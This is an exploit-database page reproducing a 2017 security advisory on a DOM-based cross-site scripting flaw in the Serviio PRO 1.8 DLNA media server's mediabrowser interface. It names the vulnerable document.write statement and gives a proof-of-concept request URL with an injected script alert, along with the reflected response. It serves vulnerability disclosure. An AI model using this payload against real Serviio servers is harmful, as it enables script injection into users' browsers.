[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) XSS Vulnerability

Author
LiquidWorm
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-27713
Category
web applications
Date add
04-05-2017
Platform
multiple
Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) DOM Based XSS


Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1

Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.

Desc: The application is vulnerable to a DOM-based cross-site scripting. Data is
read from document.location and passed to document.write() via the following statement
in the response: document.write('<base href="' + document.location + '" />');
This can be exploited to execute arbitrary HTML and script code in a user's browser DOM
in context of an affected site.

Tested on: Restlet-Framework/2.2
           Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
           Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
           Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5406
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5406.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094


12.12.2016

--


Request:

http://172.19.0.214:23424/mediabrowser/#/browse/V_F?title=Folders&b=Home&b=Video&bid=0"><script>alert("ZSL")</script>


Element response:

<base href="http://172.19.0.214:23424/mediabrowser/#/login?title=Folders&b=Home&b=Video&bid=0%22%3E%3Cscript%3Ealert(%22ZSL%22)%3C%2Fscript%3E">

#  0day.today [2024-11-15]  #